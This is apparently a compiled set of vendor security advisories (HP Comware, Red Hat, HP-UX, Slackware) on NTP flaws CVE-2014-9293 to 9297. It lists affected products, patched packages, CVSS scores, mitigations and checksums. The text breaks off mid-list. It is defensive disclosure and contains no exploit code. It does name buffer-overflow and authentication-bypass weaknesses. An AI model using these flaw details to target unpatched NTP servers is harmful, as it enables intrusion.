(Comware 5 Low Encryption SW)\n R2513L61\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-9295\n\n6600 RSE RU (Comware 5 Low Encryption SW)\n R3303P18\n JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1\nTAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\n6600 RPE RU (Comware 5 Low Encryption SW)\n R3303P18\n JC165A) HP 6600 RPE-X1 Router Module, JG781A) HP 6600 RPE-X1 TAA-compliant\nMain Processing Unit\n\n CVE-2014-9295\n\n6602 RU (Comware 5 Low Encryption SW)\n R3303P18\n JC176A) HP 6602 Router Chassis\n\n CVE-2014-9295\n\nHSR6602 RU (Comware 5 Low Encryption SW)\n R3303P18\n JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router\nChassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JG353A\nHP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1\nRouter Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing\nUnit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG\nTAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main\nProcessing Unit\n\n CVE-2014-9295\n\nHSR6800 RU (Comware 5 Low Encryption SW)\n R3303P18\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing\nUnit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nSMB1910 (Comware 5)\n R1108\n JG540A HP 1910-48 Switch, JG539A HP 1910-24-PoE+ Switch, JG538A HP 1910-24\nSwitch, JG537A HP 1910-8 -PoE+ Switch, JG536A HP 1910-8 Switch\n\n CVE-2014-9295\n\nSMB1920 (Comware 5)\n R1106\n JG928A HP 1920-48G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch, JG926A HP\n1920-24G-PoE+ (370W) Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG924A HP\n1920-24G Switch, JG923A HP 1920-16G Switch, JG922A HP 1920-8G-PoE+ (180W)\nSwitch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG920A HP 1920-8G Switch\n\n CVE-2014-9295\n\nV1910 (Comware 5)\n R1513P95\n JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE\n(365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G\nSwitch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A\nHP 1910-8G-PoE+ (180W) Switch\n\n CVE-2014-9295\n\nSMB 1620 (Comware 5)\n R1105\n JG914A HP 1620-48G Switch, JG913A HP 1620-24G Switch, JG912A HP 1620-8G\nSwitch\n\n CVE-2014-9295\n\nCOMWARE 7 Products\n\n12500 (Comware 7)\n R7328P04\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP\n12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP\nFF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP\nFF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU, JG836A HP FlexFabric\n12518E AC Switch TAA-compliant Chassis, JG834A HP FlexFabric 12508E AC Switch\nTAA-compliant Chassis, JG835A HP FlexFabric 12508E DC Switch TAA-compliant\nChassis, JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis, JG803A\nHP FlexFabric 12500E TAA-compliant Main Processing Unit, JG796A HP FlexFabric\n12500 48-port 10GbE SFP+ FD Module, JG790A HP FlexFabric 12500 16-port 40GbE\nQSFP+ FD Module, JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module,\nJG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module, JG788A HP FlexFabric\n12500 4-port 100GbE CFP FG Module, JG786A HP FlexFabric 12500 4-port 100GbE\nCFP FD Module, JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant\nModule, JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant\nModule, JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant\nModule, JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant\nModule, JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module,\nJG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module, JG798A\nHP FlexFabric 12508E Fabric Module\n H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch\n(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis\n(0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C\n12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n CVE-2014-9295\n\n11900 (Comware 7)\n R7169P01\n JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing\nUnit, JG610A HP FF 11908 1.92Tbps Type D Fabric Module, JG611A HP FF 11900\n32p 10GbE SFP+ SF Module, JG612A HP FF 11900 48p 10GbE SFP+ SF Module, JG613A\nHP FF 11900 4p 40GbE QSFP+ SF Module, JG614A HP FF 11900 8p 40GbE QSFP+ SF\nModule, JG615A HP FF 11900 24-p 1/10GBASE-T SF Module, JG616A HP FF 11900\n2500W AC Power Supply, JG617A HP FF 11900 2400W DC Power Supply, JG618A HP FF\n11908-V Spare Fan Assy, JG918A HP FF 11900 2p 100GbE CFP SE Module\n\n CVE-2014-9295\n\n10500 (Comware 7)\n R7150\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA\nSwitch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA\nSwitch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A\nMPU w/Comware v7 OS, JH198A HP 10500 Type D Main Processing Unit with Comware\nv7 Operating System, JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+\n(SFP+,LC) SE Module, JH192A HP 10500 48-port Gig-TRJ45SE Module, JH193A HP\n10500 16-port 10GbE SFP+ (SFP+,LC) SF Module, JH194A HP 10500 24-port 10GbE\nSFP+ (SFP+,LC) EC Module, JH195A HP 10500 6-port 40GbE QSFP+ EC Module,\nJH196A HP 10500 2-port 100GbE CFP EC Module, JH197A HP 10500 48-port 10GbE\nSFP+ (SFP+,LC) SG Module\n N/A\n CVE-2014-9295\n\n12900 (Comware 7)\n R1112\n JG619A HP FlexFabric 12910 Switch AC Chassis, JG621A HP FlexFabric 12910\nMain Processing Unit, JG632A HP FlexFabric 12916 Switch AC Chassis, JG634A HP\nFlexFabric 12916 Main Processing Unit\n\n CVE-2014-9295\n\n5900 (Comware 7)\n R2311P06\n JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch,\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA\nSwitch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch, JH036A HP FlexFabric 5900CP\n48XG 4QSFP+ TAA-Compliant, JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant\nSwitch, JH038A) HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n\n CVE-2014-9295\n\n5920 (Comware 7)\n R2311P06\n JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch\n\n CVE-2014-9295\n\nMSR1000 (Comware 7)\n R0106P31\n JG875A HP MSR1002-4 AC Router, JH060A HP MSR1003-8S AC Router\n\n CVE-2014-9295\n\nMSR2000 (Comware 7)\n R0106P31\n JG411A HP MSR2003 AC Router, JG734A HP MSR2004-24 AC Router, JG735A) HP\nMSR2004-48 Router, JG866A HP MSR2003 TAA-compliant AC Router\n\n CVE-2014-9295\n\nMSR3000 (Comware 7)\n R0106P31\n JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC\nRouter, JG407A HP MSR3024 DC Router, JG408A HP MSR3024 PoE Router, JG409A HP\nMSR3012 AC Router, JG410A HP MSR3012 DC Router, JG861A HP MSR3024\nTAA-compliant AC Router\n\n CVE-2014-9295\n\nMSR4000 (Comware 7)\n R0106P31\n JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A\nHP MSR4000 MPU-100 Main Processing Unit, JG869A HP MSR4000 TAA-compliant\nMPU-100 Main Processing Unit\n\n CVE-2014-9295\n\n5800 (Comware 7)\n R7006P12\n JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP\n5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2\nSlots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP\n5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot,\nJC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1\nInterface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1\nInterface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP\n5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch,\nJG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant\nSwitch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch\nwith 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1\nInterface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\nSlot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B\nHP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G\nSwitch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant\nSwitch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch\nwith 2 Interface Slots, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B\nHP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+\nTAA-compliant Switch with 2 Interface Slots \u0026 1 OAA Slot, JG259B HP\n5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot,\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch\nwith 2 Interface Slots \u0026 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP\n5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+\nSwitch\n\n CVE-2014-9295\n\nVSR (Comware 7)\n R0204P01\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software,\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004\nComware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual\nServices Router\n\n CVE-2014-9295\n\n7900 (Comware 7)\n R2122\n JG682A HP FlexFabric 7904 Switch Chassis, JG841A HP FlexFabric 7910 Switch\nChassis, JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit,\nJH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n\n CVE-2014-9295\n\n5130 (Comware 7)\n R3108P03\n JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch,\nJG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI\nSwitch, JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch, JG975A HP\n5130-24G-4SFP+ EI Brazil Switch, JG976A HP 5130-48G-4SFP+ EI Brazil Switch,\nJG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch, JG978A HP\n5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n\n CVE-2014-9295\n\n5700 (Comware 7)\n R2311P06\n JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch, JG895A HP FlexFabric\n5700-48G-4XG-2QSFP+ TAA-compliant Switch, JG896A HP FlexFabric\n5700-40XG-2QSFP+ Switch, JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant\nSwitch, JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch, JG899A HP\nFlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n\n CVE-2014-9295\n\nVCX\n 9.8.17\n J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005\nPltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server,\nJE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL\n120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX\nIPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary,\nJE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM\nModule, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform\n9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router\nwith VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP\nMSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS\nMod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR\nw/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX\nConnect 100 Sec Server 9.0\n\n CVE -2014-9293 CVE-2014-9294 CVE-2014-9295\n\nHISTORY\nVersion:1 (rev.1) - 9 December 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: ntp security update\nAdvisory ID:       RHSA-2015:0104-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2015-0104.html\nIssue date:        2015-01-28\nCVE Names:         CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 \n                   CVE-2014-9296 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix several security issues are now available for\nRed Hat Enterprise Linux 6.5 Extended Update Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.5) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.5) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.5) - i386, noarch, ppc64, s390x, x86_64\n\n3. \n\nMultiple buffer overflow flaws were discovered in ntpd\u0027s crypto_recv(),\nctl_putdata(), and configure() functions. Note: the crypto_recv() flaw requires non-default\nconfigurations to be active, while the ctl_putdata() flaw, by default, can\nonly be exploited via local attackers, and the configure() flaw requires\nadditional authentication to exploit. (CVE-2014-9295)\n\nIt was found that ntpd automatically generated weak keys for its internal\nuse if no ntpdc request authentication key was specified in the ntp.conf\nconfiguration file. A remote attacker able to match the configured IP\nrestrictions could guess the generated key, and possibly use it to send\nntpdc query or configuration requests. (CVE-2014-9293)\n\nIt was found that ntp-keygen used a weak method for generating MD5 keys. \nThis could possibly allow an attacker to guess generated MD5 keys that\ncould then be used to spoof an NTP client or server. Note: it is\nrecommended to regenerate any MD5 keys that had explicitly been generated\nwith ntp-keygen; the default installation does not contain such keys. \n(CVE-2014-9294)\n\nA missing return statement in the receive() function could potentially\nallow a remote attacker to bypass NTP\u0027s authentication mechanism. \n(CVE-2014-9296)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains backported patches to resolve these issues. After installing the\nupdate, the ntpd daemon will restart automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()\n1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys\n1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets\n1176040 - CVE-2014-9296 ntp: receive() missing return on error\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_5.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntpdate-4.2.6p5-2.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_5.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_5.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm\nntpdate-4.2.6p5-2.el6_5.i686.rpm\n\nppc64:\nntp-4.2.6p5-2.el6_5.ppc64.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm\nntpdate-4.2.6p5-2.el6_5.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-2.el6_5.s390x.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm\nntpdate-4.2.6p5-2.el6_5.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_5.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntpdate-4.2.6p5-2.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm\nntp-perl-4.2.6p5-2.el6_5.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_5.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm\nntp-perl-4.2.6p5-2.el6_5.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm\nntp-perl-4.2.6p5-2.el6_5.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9293\nhttps://access.redhat.com/security/cve/CVE-2014-9294\nhttps://access.redhat.com/security/cve/CVE-2014-9295\nhttps://access.redhat.com/security/cve/CVE-2014-9296\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUyTXWXlSAg2UNWIIRAsXzAKCilJuJeeWLOABs1xY+ueRvRTSpWACcDhoC\nYQlhn66RRMYQCWymo1OCUoI=\n=4Rft\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nRelease Date: 2015-02-18\nLast Updated: 2015-02-18\n\nPotential Security Impact: Remote execution of code, Denial of Service (DoS),\nor other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nNTP. These could be exploited remotely to execute code, create a Denial of\nService (DoS), or other vulnerabilities. \n\nReferences:\n\nCVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG)\n(CWE-332)\nCVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338)\nCVE-2014-9295 - Stack Buffer Overflow (CWE-121)\nCVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389)\nCVE-2014-9297 - Improper Check for Unusual or Exceptional Conditions\n(CWE-754)\nSSRT101872\nVU#852879\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.31 running NTP version C.4.2.6.4.0 or previous\nHP-UX B.11.23 running XNTP version 3.5 or previous\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2014-9293    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2014-9294    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2014-9295    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2014-9296    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-9297    (AV:N/AC:H/Au:N/C:P/I:N/A:N)       2.6\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following patch for HP-UX B.11.31. A workaround for HP-UX\nB.11.23 and B.11.11 to temporarily resolve these vulnerabilities follows\nbelow. \n\nThe B.11.31 patch is available from:\nftp://ntp42650:Secure12@h2.usa.hp.com or https://h20392.www2.hp.com/portal/sw\ndepot/displayProductInfo.do?productNumber=HPUX-NTP\n\nMitigation steps for HP-UX B.11.23 and B.11.11 for CVE-2014-9295\n\nRestrict query for server status (Time Service is not affected) from\nntpq/ntpdc by enabling .noquery. using the restrict command in /etc/ntp.conf\nfile. \n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nNOTE: This bulletin will be revised when patches for XNTP v3.5 on B.11.23 and\nB.11.11 become available. \n\nMANUAL ACTIONS: No\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.5.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 18 February 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8-i486-1_slack14.1.txz:  Upgraded. \n  In addition to bug fixes and enhancements, this release fixes\n  several high-severity vulnerabilities discovered by Neel Mehta\n  and Stephen Roettger of the Google Security Team. \n  For more information, see:\n    https://www.kb.cert.org/vuls/id/852879\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n18d7f09e90cf2434f59d7e9f11478fba  ntp-4.2.8-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nedd178e3d2636433dd18f52331af17a5  ntp-4.2.8-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n4b6da6fa564b1fe00920d402ff97bd43  ntp-4.2.8-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n292ae7dbd3ea593c5e28cbba7c2b71fa  ntp-4.2.8-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n294b8197d360f9a3cf8186619b60b73c  ntp-4.2.8-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n7cd5b63f8371b1cc369bc56e4b4efd5a  ntp-4.2.8-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n32eab67538c33e4669bda9200799a497  ntp-4.2.8-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n33ecf4845fa8533a12a98879815bde08  